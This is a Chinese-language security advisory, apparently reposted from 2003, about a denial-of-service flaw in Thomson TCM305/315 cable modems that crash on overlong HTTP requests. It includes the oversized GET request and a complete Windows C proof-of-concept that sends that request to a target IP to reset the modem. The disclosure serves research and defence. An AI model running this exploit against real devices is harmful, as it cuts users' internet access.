Thomson Cable Modem远程拒绝服务安全漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2005-07-07
Thomson Cable Modem远程拒绝服务安全漏洞

发布日期: 2003-12-1
受影响系统:
Thomnson TCM 305 Cable Modem
Thomnson TCM 315 Cable Modem
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9091

Thomson TCM315是宽带有线MODEM设备。

Thomson TCM315包含的HTTP接口对超长请求缺少正确处理,远程安全者可以利用这个漏洞进行拒绝服务安全。

发送包含超长字符串的HTTP请求给Thomson TCM315 Modem,可导致设备崩溃,停止正常响应。

<*来源:Andrés Tarascó (admin@shellsec.net)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106969066405526&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!

Andrés Tarascó (admin@shellsec.net)提供了如下测试方法:

GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1

http://<cablemodem.IP>/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Andrés Tarascó(admin@shellsec.net) 提供了如下测试程序:

/*
ADVISORY - Thomson Cablemodem TCM315 Denial of Service

Shell security group (2003) http://www.shellsec.net

November 10 of 2003

Tested against: TCM315 MP
Software Version: ST31.04.00
Software Model: A801
Bootloader: 2.1.4c
Impact: Users with access to the network can remotely shutdown internet
connection.

Discovered by: aT4r Andres[at]shellsec.net
Vendor: contacted (no answer)
Fix: no yet

usage: just, thdos.exe 192.168.100.1

*/

#include <stdio.h>
#include <winsock2.h>

void main(int argc,char *argv[]) {
char evil[150],buffer[1000];
struct sockaddr_in shellsec;
int fd;
WSADATA ws;

WSAStartup( MAKEWORD(1,1), &( ws) );

shellsec.sin_family = AF_INET;
shellsec.sin_port = htons(80);
shellsec.sin_addr.s_addr = inet_addr(argv[1]);

memset(evil,'/0',sizeof(evil));
memset(evil,'A',100);
sprintf(buffer,"GET /%s HTTP/1.1/r/n/r/n/r/n",evil);

fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) {
send(fd,buffer,strlen(buffer),0);
printf("done. Thomson Cablemodem reset!/n");
sleep(100);
}
else printf("Unable to connect to CM./n");
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

Thomnson
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.qb.ro/

上一篇:Anthill远程文件包含漏洞
下一篇:Macromedia JRun管理接口多个跨站脚本安全漏洞

最近更新

随机推荐